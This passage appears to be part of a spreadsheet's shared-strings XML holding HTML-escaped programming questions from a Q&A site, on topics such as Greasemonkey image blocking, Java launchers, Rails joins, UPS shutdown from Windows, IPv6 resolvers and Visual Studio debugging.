  <si>
    <t>Removing images with Greasemonkey?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to stop images from loading, as in not even get a chance to download, using greasemonkey.  Right now I have &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var images = document.getElementsByTagName('img');
for (var i=0; i&amp;lt;images.length; i++){
    images[i].src = "";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I don't think this actually stops the images from downloading.  Anyone know how to stop the images from loading?&lt;/p&gt;
&lt;p&gt;Thanks for your time and help :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java command-line launchers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a .jar file library to implement a bunch of helper classes to interface a PC to a piece of external hardware. I'll also add some simple applications, either command-line or GUI, to handle common tasks using the library.&lt;/p&gt;
&lt;p&gt;My question is, is there a recommended way to simplify the command-line instantiation of a JVM in a certain specific way?&lt;/p&gt;
&lt;p&gt;e.g. instead of requiring a user to type a cryptic error-prone command like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java -cp TurboBlenderLib.jar -jar TurboBlenderApp.jar -DFoo=Bar arg1 arg2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;instead I do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TurboBlenderApp arg1 arg2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;?&lt;/p&gt;
&lt;p&gt;I suppose I could use shell scripts (incl. win32 Batch Files... gacckkk), it's just that I'm not good at those + I was wondering if there was a more straightforward platform-independent way of running a Java app from the commandline.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MyGeneration command line input</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have looked all over the internet, mygenteration's forum, and mygenteration's  website and I cannot figure out how to pass parameters into a template through the command line using the xmldatapath switch. Does anyone know how to do this?&lt;/p&gt;
&lt;p&gt;--edit--&lt;/p&gt;
&lt;p&gt;I did a little research and &lt;a href="http://williamsmash.com/blog/show/mygeneration-xml-input-format" rel="nofollow"&gt;here is a summary of the format of xml input for MyGeneration&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rhino Mocks: AAA test syntax without static MockRepository methods?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using (and liking) the new Rhino Mocks AAA syntax.  However, one thing that puzzles me is that I have to create my stubs and mocks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var v1 = MockRepository.GenerateStub&amp;lt;MyClass&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;instead of with an instantiated MockRepository:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var mr = new MockRepository();
var v1 = mr.GenerateStub&amp;lt;MyClass&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This syntax would make transitioning my unit tests easier.&lt;/p&gt;
&lt;p&gt;From reading Ayende's wiki it seems like the second syntax should work, but I just can't get it to function correctly.  If I do it that way then I have to use Record/Playback blocks.  I also can't find any examples online of anyone using the new syntax without the static methods.&lt;/p&gt;
&lt;p&gt;So my question is, has anyone else managed to get the AAA syntax working without using the static methods and without having to resort to Record/Playback?  If so, what am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide Tab headers in WPF TabControl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to hide Tab headers when there is only a single visible Tab?&lt;/p&gt;
&lt;p&gt;I want to hide TabControl chrome completely, while leaving the content of the Tab visible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show HH:mm 24H format in TemplateField using text property</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to show a 24 hours format using this line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Text='&amp;lt;%# Bind("Appointment", "{HH:mm}")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So how it'll be formated for showing for example 16:40 instead 4:40? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenSocial server implementation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the preferred method of implementing the OpenSocial platform? I'm aware of Apache Shindig but can't really find any useful information on it. Also, is it possible to use an existing solution like the Rails-based &lt;a href="http://lovdbyless.com/" rel="nofollow"&gt;lovdbyless&lt;/a&gt; and add OpenSocial features to it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Synchronous work in a BackgroundWorker</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My application performs time consuming work independently on several files.  I created a BackgroundWorker to pass the work off to on each file, but it appears the backgroundworker is only capable of performing asynchronous work.  Is it possible to do several asynchronous tasks in unison with it, or is there a similar object for performing synchronous operations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where would you put your new open-source .NET project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a .NET project that I will probably make open source.&lt;/p&gt;
&lt;p&gt;There are lots of places to put it though, anyone have any experience for a friction-less effort? Codeplex? Google-code?&lt;/p&gt;
&lt;p&gt;Note: I prefer Subversion for the projects source-control.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable amount recurring billing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi i'm looking for a payment gateway that can do recurring billing that changes month to month.  Fogbugz do this, they charge based on how many active users there were that month. All of the APIs that i've found only let you set a fixed amount and it's difficult/impossible to vary the subscription amount month to month.&lt;/p&gt;
&lt;p&gt;Has anyone come across any services that do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows UPS (Uninterruptible Power Supply) service - turn off UPS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the UPS service to monitor the state of my UPS from an application -- the key at HKLM\SYSTEM\CCS\Services\UPS\Status has all the information you can get from the Power control panel.  BUT -- I'd like to be able to tell the UPS to shut down from my app as well.  I know that the service can tell the UPS to shut down -- for instance, after running a set number of minutes on battery -- and I'm wondering if there's some kind of command I can send to the service to initiate a shutdown manually.&lt;/p&gt;
&lt;p&gt;I'm having trouble searching for this information -- people tend to misspell "Uninterruptible" (hrm, Firefox red-lined that but doesn't have an alternative) and "UPS" just gets hits for the shipping service.  Maybe I can do something through System.ServiceController, or WMI?&lt;/p&gt;
&lt;p&gt;CLARIFICATION: Yes, I am talking about powering down the physical UPS device.  I know how to stop the service.  I figured it would be a common problem -- I want my UPS to turn off with the PC.  I had an idea I'm going to try, based on &lt;a href="http://msdn.microsoft.com/en-us/library/ms789319.aspx" rel="nofollow"&gt;this page&lt;/a&gt;.  You see, APC (and everybody else) has to supply a DLL for the UPS service to call, and since the function calls are well documented, there's no reason I shouldn't be able to P/Invoke them.  I'll re-edit this once I know whether or not it worked.&lt;/p&gt;
&lt;p&gt;Update: I tried invoking UPSInit, then UPSTurnOff, and nothing happens.  I'll tinker with it some more, but the direct call to apcups.dll might be a dead end.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make this Ruby on Rails page more efficient?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a site where users can track their collection of figures for Dungeons &amp;amp; Dragons (www.ddmdb.com).  The models/relationships involved in this funcitonality are the following:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;User:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;id&lt;/li&gt;
&lt;li&gt;login (username)&lt;/li&gt;
&lt;li&gt;&lt;em&gt;a bunch of other fields&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Miniature:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;id&lt;/li&gt;
&lt;li&gt;name&lt;/li&gt;
&lt;li&gt;number (# in the set, not count)&lt;/li&gt;
&lt;li&gt;release_id (foreign key)&lt;/li&gt;
&lt;li&gt;&lt;em&gt;a bunch of other fields and foreign keys&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Ownership:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;id (is this really even needed?)&lt;/li&gt;
&lt;li&gt;user_id&lt;/li&gt;
&lt;li&gt;miniature_id&lt;/li&gt;
&lt;li&gt;have_count&lt;/li&gt;
&lt;li&gt;favorite (boolean)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The pertinent relationships I have set up are as follows:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;User:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;has_many :ownerships&lt;/li&gt;
&lt;li&gt;has_many :miniatures, :through =&gt; :ownerships, :uniq =&gt; true, :conditions =&gt; "ownerships.have_count &gt; 0"&lt;/li&gt;
&lt;li&gt;has_many :favorites, :through =&gt; :ownerships, :source =&gt; :miniature, :uniq =&gt; true, :conditions =&gt; "ownerships.favorite = true"&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Miniatures:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;has_many :ownerships&lt;/li&gt;
&lt;li&gt;has_many :owners, :through =&gt; :ownerships, :source =&gt; :user, :uniq =&gt; true, :conditions =&gt; "ownerships.have_count &gt; 0"&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Ownership:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;belongs_to :user&lt;/li&gt;
&lt;li&gt;belongs_to :miniature&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have a page where user's can both view and update their collection, as well as view other user's collections.  It contains a list of all the miniatures on the site and a text box next to each where the user can enter how many of each miniature they have.  This functionality also exists in sub-lists of miniatures (filtered by type, release, size, rarity, etc.)&lt;/p&gt;
&lt;p&gt;When a user creates an account they have no entries in the ownership.  When they use the collection page or sub-list of miniatures to update their collection, I create entries in the ownership table for only the miniatures on the submitting page.  So if it's the full Collection list I update all minis (even if the count is 0) or if it's a sub-list, I only update those miniatures.  So at any time a particular user I may have:
  - no entries in ownership
  - entries for some of the miniatures
  - entries for all the miniatures.&lt;/p&gt;
&lt;p&gt;The problem I'm having is that I don't know how to query the database with a LEFT JOIN using a "Rails method" so that if a user doesn't have an entry for a miniature in Ownerships it defaults to a have_count of 0.  Currently I query for each user_id/miniature_id combination individually as I loop through all miniatures and it's obviously really inefficient.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;View:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% for miniature in @miniatures %&amp;gt;
  &amp;lt;td&amp;gt;&amp;lt;%= link_to miniature.name, miniature %&amp;gt;&amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;&amp;lt;%= text_field_tag "counts[#{miniature.id}]", get_user_miniature_count(current_user, miniature), :size =&amp;gt; 2 %&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;% end %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Helper:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def get_user_miniature_count(user, miniature)
  ownerships = user.ownerships
  ownership = user.ownerships.find_by_miniature_id(miniature.id)
  if ownership.nil?
    return 0
  else
    return ownership.have_count
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;An alternate solution would be creating entries for all miniatures when a user signs up, but then I would also have to add a 0 have_count for all users when a new miniature is added to the database after they sign up.  That seems like it could get a bit complex, but perhaps it's the right way to go?&lt;/p&gt;
&lt;p&gt;Is there a way to do the join and supply a default value for miniatures where there's no entries in the Ownership table for that particular user?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fast eclipse mode for PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know of a fast PHP mode for eclipse?  I have tried the Aptana PHP mode, and PDT, but neither can place a character in under a second, which is no way to write code.&lt;/p&gt;
&lt;p&gt;Its probably due to my editing on a network drive, but it seems silly that an editor would depend so heavily on the hard drive.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make an image center (vertically &amp; horizontally) inside a bigger div</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a div 200 x 200 px. I want to place a 50 x 50 px image right in the middle of the div. &lt;/p&gt;
&lt;p&gt;How can it be done?&lt;/p&gt;
&lt;p&gt;I am able to get it centered horizontally by using &lt;code&gt;text-align: center&lt;/code&gt; for the div. But vertical alignment is the issue..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Architectural Suggestions in a Linux App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've done quite a bit of programming on Windows but now I have to write my first Linux app. &lt;/p&gt;
&lt;p&gt;I need to talk to a hardware device using UDP. I have to send 60 packets a second with a size of 40 bytes. If I send less than 60 packets within 1 second, bad things will happen.
The data for the packets may take a while to generate. But if the data isn't ready to send out on the wire, it's ok to send the same data that was sent out last time.
The computer is a command-line only setup and will only run this program.&lt;/p&gt;
&lt;p&gt;I don't know much about Linux so I was hoping to get a general idea how you might set up an app to meet these requirements.
I was hoping for an answer like:&lt;/p&gt;
&lt;p&gt;Make 2 threads, one for sending packets and the other for the calculations.&lt;/p&gt;
&lt;p&gt;But I'm not sure it's that simple (maybe it is). Maybe it would be more reliable to make some sort of daemon that just sent out packets from shared memory or something and then have another app do the calculations? If it is some multiple process solution, what communication mechanism would you recommend?
Is there some way I can give my app more priority than normal or something similar?&lt;/p&gt;
&lt;p&gt;PS: The more bulletproof the better!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you run EJB 2.1 beans in OSGi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a J2EE 1.3 app that uses EJB 2.1 session and entity beans. Currently this app runs as an EAR file on JBoss. I'd like to switch to the SpringSource dm Application Server because of all the benefits that OSGi provides.&lt;/p&gt;
&lt;p&gt;Does anyone know if there's an OSGi bundle that can act as an EJB container? Can &lt;a href="http://openejb.apache.org/" rel="nofollow"&gt;OpenEJB&lt;/a&gt; do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stacktrace information preserving paths of original source</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using C#.net for application development.&lt;/p&gt;
&lt;p&gt;To log and debug exceptions, I use the stacktrace.&lt;/p&gt;
&lt;p&gt;I executed my application on another machine, but when errors occur it refers to the path of my development machine.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ex:   D:\Projects\xyz.CS line no :12 _Error_message_here.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why does it trace to the path on my &lt;em&gt;development&lt;/em&gt; machine path even though I am running the application on another machine?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unicode characters in Windows command line - how?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a project in TFS that has a non-English character (Å¡) in it. When trying to script a few build-related things we've stumbled upon a problem - we can't pass the &lt;strong&gt;Å¡&lt;/strong&gt; letter to the command line tools. Command prompt or what not else messes it up, and the &lt;strong&gt;tf.exe&lt;/strong&gt; utility can't find the specified project.&lt;/p&gt;
&lt;p&gt;I've tried different formats for the .bat file (ANSI, UTF-8 with and without BOM) as well as scripting it in JavaScript (which is Unicode inherently) - but no luck. Anybody have an idea how to excecute a program and pass it a &lt;strong&gt;Unicode&lt;/strong&gt; command line?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read .config file in another assembly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any possiblity to read a .config file in a dll assembly? At the moment I use OpenExeConfiguration on a Assembly.Location Property which seems to work. But I want to create separate .config files for different usages like ConfigModuleA.config, ConfigModuleB.config etc. &lt;/p&gt;
&lt;p&gt;Any idea? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>TestDriven.net with Gallio, MbUnit and NCover problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why doesnt TestDriven.Net work with my gallio/mbunit tests?&lt;/p&gt;
&lt;p&gt;I've used TDD.Net with MbUnit v2 and not had any problems, but with the new gallio release on my new pc, it does nothing.&lt;/p&gt;
&lt;p&gt;From the tdd right click menu in solution explorer, if i do "test with debugger" i get "0 passed, 0 failed, 0 skipped" in the VS status bar at the bottom of the screen.&lt;/p&gt;
&lt;p&gt;If i right click my fixture and do the same, i get&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"The target type doesn't contain tests from a known test framework or a 'Main' method."
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If i do it on an individual test, it looks like its not running the SetUp, so the test fails (but at least it runs)&lt;/p&gt;
&lt;p&gt;I know this sounds like &lt;a href="http://stackoverflow.com/questions/3984/testdrivennet-is-not-running-my-setup-methods-for-mbunit"&gt;this&lt;/a&gt; problem, but my registry looks correct.&lt;/p&gt;
&lt;p&gt;If i try and run NCover from the TDD.Net menu, nothing happens (other than an an output window flicker)&lt;/p&gt;
&lt;p&gt;When i do "run unit tests" with resharper it picks them all up and runs correctly.&lt;/p&gt;
&lt;p&gt;Im using Gallio/MbUnit 3.0.5.546, TDD.Net 2.18.2268, Resharper 4.1, VS 2k8 Pro 9.0.30729.1 SP, .Net 3.5 SP1, Windows Server 2k8 (x86)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular expression for allow only numbers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to check the following with regular expression&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{Today,Format}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Today - will be remains as it is.
In the place of Format, we can allow the digits from 0 to 12.&lt;/p&gt;
&lt;p&gt;for example: we have to allow&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{Today,0}
{Today,1}
{Today,2}
...
{Today,12}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and also have to allow &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{Today,}
{Today,Format}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please help me and also refer me to some site to develop my regular expression skills.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use the built in password reset/change views with my own templates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example I can point the &lt;code&gt;url '^/accounts/password/reset/$'&lt;/code&gt; to &lt;code&gt;django.contrib.auth.views.password_reset&lt;/code&gt; with my template filename in the context but I think need to send more context details.&lt;/p&gt;
&lt;p&gt;I need to  know exactly what context to add for each of the password reset and change views.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking flash file loading with javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to check how much a flash file is (down)loaded to the page before it is shown?
Our team cant put loading indicator inside the flash file because the swf file is uploaded by our client. Is there some kind of property on xmlhttprequest that we can use to indicate how much has been downloaded?
Or any other suggestion to indicate on-screen the loaded percentage?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using the name resolver of resolv.h with IPv6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I write or modify programs which perform name resolution and need a
good control of the process. So I do not use &lt;code&gt;getaddrinfo()&lt;/code&gt;, I go
deeper and use &lt;code&gt;res_query()&lt;/code&gt; / &lt;code&gt;res_send()&lt;/code&gt; / etc in &lt;code&gt;resolv.h&lt;/code&gt;, documented
in resolver(3). &lt;/p&gt;
&lt;p&gt;Although not documented, the common way to set the resolver used is to
update &lt;code&gt;_res.nsaddr_list&lt;/code&gt;. But this array, defined in resolv.h, stores
&lt;code&gt;struct sockaddr_in&lt;/code&gt;, that is IPv4 addresses only. (IPv6 addresses
are &lt;code&gt;struct sockaddr_in6&lt;/code&gt;, a family-independant system would use &lt;code&gt;struct sockaddr&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;I'm looking for a way (preferrably portable, at least among the
various Unix) to tell &lt;code&gt;_res&lt;/code&gt; that I want also IPv6 addresses.&lt;/p&gt;
&lt;p&gt;Apparently, a long time ago, there was in FreeBSD a &lt;code&gt;_res_ext&lt;/code&gt; with this
ability but I cannot find it anymore in a recent FreeBSD 7 (&lt;code&gt;grep
_res_ext /usr/include/resolv.h&lt;/code&gt; finds nothing). You can still find
&lt;a href="http://www.squid-cache.org/~hno/changesets/squid3/patches/5775.patch" rel="nofollow"&gt;code which uses it (try yourself with Google Codesearch&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Thanks to Alnitak, I noticed it is apparently now &lt;code&gt;_res._ext&lt;/code&gt; and not &lt;code&gt;.res_ext&lt;/code&gt;. I wonder where these sort of things are documented or announced... I have no idea how portable &lt;code&gt;_res._ext&lt;/code&gt; is. I can find it on Debian and FreeBSD. It seems there are few programs which use it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mac Browsers - Is IE5.x for the Mac officially dead?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't use a mac much so my exposure is minimal but can I safely presume that IE on the Mac is dead?&lt;/p&gt;
&lt;p&gt;I know that Microsoft isn't developing it any further and that Firefox, Safari (Opera and Camino) all run on Mac (and from my stats they are most used, in that order)...&lt;/p&gt;
&lt;p&gt;So the question is: Is it dead? and if so, when did it die?&lt;/p&gt;
&lt;p&gt;I still see CSS templates with Mac IE hacks in place... but I'm thinking it is time to strip the dead weight.  Am I right?&lt;/p&gt;
&lt;p&gt;PS For anyone hosting a large commercial site, I'd be interested in the % of customers using Mac IE. &lt;em&gt;(Customers being users that actually buy something, not just web developers ping'ing amazon.com to see what it looks like)&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does the AddExtension property work in C# 2.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to open a save file dialog, have the user enter a filename, and if they forget the .csv extension, have it tacked on.&lt;/p&gt;
&lt;p&gt;It would seem that the SaveFileDialog AddExtension property would work, but its doesn't. I've even set the DefaultExt property to .csv, and still nothing gets tacked on. My file gets saved just fine, but sans extension, so the user can't just double click on the file and have it open in Excel.&lt;/p&gt;
&lt;p&gt;I have to be missing something obvious. Here's what I've got&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        SaveFileDialog sfd = new SaveFileDialog();
        sfd.DefaultExt = "*.csv";
        sfd.Filter = "Comma Separated(*.csv)|*.*";
        if (sfd.ShowDialog() == DialogResult.OK)
        {
            // Do my file saving
        }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 on Vista problems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have any problems with VS2008 on Vista?
For me every so often when I select items in the solution explorer the screen goes blank. No other application causes this to happen.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a built-in IsLowerCase() in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a built-in &lt;code&gt;IsLowerCase()&lt;/code&gt; in .NET? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Expanding a node in ASP.Net TreeView through XML Attribute</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ASP.Net TreeView control that I am binding to an XML data source. I'm wanting to be able to control which nodes are expanded and which ones are collapsed in the XML definition file. The Expanded='' doesn't work for me though. In the following simple example, I want Node 2 to be fully expanded.&lt;/p&gt;
&lt;p&gt;ASP Page...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:XmlDataSource ID="oXmlDataSource" runat="server" /&amp;gt;
&amp;lt;asp:TreeView ID="TreeView1" runat="server" EnableViewState="false" DataSourceID="oXmlDataSource"&amp;gt;&amp;lt;/TreeView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code Behind...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;oXmlDataSource.Data = MyXMLString;
oXmlDataSource.XPath = "/Tree/Node";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the XML...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version='1.0' encoding='utf-8' ?&amp;gt;
&amp;lt;Tree Text='example.aspx' Href='example.aspx'&amp;gt;
      &amp;lt;Node Text='Example Node 1' Href='0800200c9a66.aspx' Expanded='false'&amp;gt;&amp;lt;/Node&amp;gt;
      &amp;lt;Node Text='Example Node 2' Href='0800200c9a66.aspx' Expanded='true'&amp;gt;
         &amp;lt;Node Text='Example Node 3' Href='0800200c9a66.aspx' Expanded='false'&amp;gt;&amp;lt;/Node&amp;gt;
         &amp;lt;Node Text='Example Node 4' Href='0800200c9a66.aspx' Expanded='false'&amp;gt;&amp;lt;/Node&amp;gt;
         &amp;lt;Node Text='Example Node 5' Href='0800200c9a66.aspx' Expanded='false'&amp;gt;&amp;lt;/Node&amp;gt;
         &amp;lt;Node Text='Example Node 6' Href='0800200c9a66.aspx' Expanded='false'&amp;gt;&amp;lt;/Node&amp;gt;
      &amp;lt;/Node&amp;gt;
&amp;lt;/Tree&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>assert and NDEBUG</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After reading some threads on misuses of exceptions (basically saying you don't want to unwind the stack if a functions preconditions are incorrect - possibly signalling that all your memory is corrupt or something equally dangerous) I'm thinking about using assert() more often. Previously I have only used assert() as a debug tool and I think this is how a lot of C++ programmers use it. I'm concerned about part of my error handling being turned off by a NDEBUG #define introduced to the runtime builds at some point in the future. Is there a way round this and have others had a problem with this (i.e. should I be worrying about it)?&lt;/p&gt;
&lt;p&gt;Thanks,
Pat&lt;/p&gt;
&lt;p&gt;Edit:
The point of the threads I was reading was that if your application is truely buggered then unwinding stack could damage the system, for instance if a destructor wrote something to a file and the file handle was corrupted. I'm not suggesting using assert for normal error handling. The current use case I have is pretty weak but see what you think:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
  //check later code won't crash the system
  if( buf.length() % 2 )
    return false;
  // do other stuff that shouldn't affect bufs length
  //copy 2 bytes into buf at a time, if length is odd then don't know 
  //what will happen so use assert to make sure it can't damage anything
  assert( !(buf.length() % 2) );
  for( i = 0; i != buf.length(); i += 2 )
    memcpy( buf + i, data, 2 );
 &lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;edit2: the discussion is here:
&lt;a href="http://groups.google.com/group/comp.lang.c++.moderated/browse_frm/thread/80083ac31a1188da" rel="nofollow"&gt;http://groups.google.com/group/comp.lang.c++.moderated/browse_frm/thread/80083ac31a1188da&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't debug - "The breakpoint will not currently be hit. No symbols have been loaded for this document"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting the error in the subject line. I'm running vs2k8 on server 2k3sp2. I've tried deleting the pdbs, cache directories, verifying that debugging is set up on the specific page. The interesting thing is other pages debug just fine. Just when I go to this one page. Must be a configuration issue but the page directive looks like this:&lt;/p&gt;
&lt;p&gt;print("&amp;lt;%@ Page Language='C#' AutoEventWireup='true' CodeBehind='MemberSearch.aspx.cs' Inherits='SurencyPortal.EmployerPortal.MemberSearch'  Debug='true' %&gt;");&lt;/p&gt;
&lt;p&gt;I've also noticed that when debugging, if I open the modules window, almost all of the symbols show a status of 'Symbol not loaded'. However, after more research from the msdn article below, one of the MSFT posts said that if it's a core .net dll, it will not load symbols so I'm not worried about that. Some of the microsoft modules (like System.Enterpricesservices.wrapper.dll) show an exclamation point with the message 'the module did not load at the default load address'. Not sure why that dll is there as I don't know of any calls to it.&lt;/p&gt;
&lt;p&gt;Here are the thing's i've tried:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/163133/breakpoint-not-hooked-up-when-debugging-in-vsnet-2005"&gt;http://stackoverflow.com/questions/163133/breakpoint-not-hooked-up-when-debugging-in-vsnet-2005&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://social.msdn.microsoft.com/Forums/en-US/vbide/thread/557fdedb-268e-48a8-9944-29b2b4e0dec2/#page:3"&gt;http://social.msdn.microsoft.com/Forums/en-US/vbide/thread/557fdedb-268e-48a8-9944-29b2b4e0dec2/#page:3&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Bill&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Raising javascript events in ASP.NET user control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to raise a "custom event" in an ASP.NET user control and to subscribe to the event in the calling page? This way I can have any containing page react to changes in a user control without having to do a partial or full postback.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JPA - Hibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone put in perspective the difference between JPA and Hibernate.
Or are these complementary concepts, to be used together?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing Excel 2007 Binary (.xlsb) via OleDb ACE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found the Excel 2007 Binary format (with extension .xlsb) perfectly 
suitable for my needs, since it's fast to load and very compact. I deliver a 
bunch of reports in Excel that carry a lot of data, and those reports are 
actually being loaded with an IS package.&lt;/p&gt;
&lt;p&gt;So I assumed the conversion to this very format, read documentation on 
Access Ole DB Provider 12, where is written that xlsb is supported by this 
provider. I converted the files in Excel, and then when trying to change them 
in the packages (just by changing the path of the file by adding the "b" 
suffix), I got the following error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"Test connection failed because of an error in initializing provider. This 
file was created in a previous beta version of Excel 2007.  Open the file 
with Excel 2007 to save it to the most recent version of the Excel 2007 file 
format before opening the file in Access 2007."
&lt;/code&gt;&lt;/pre&gt;
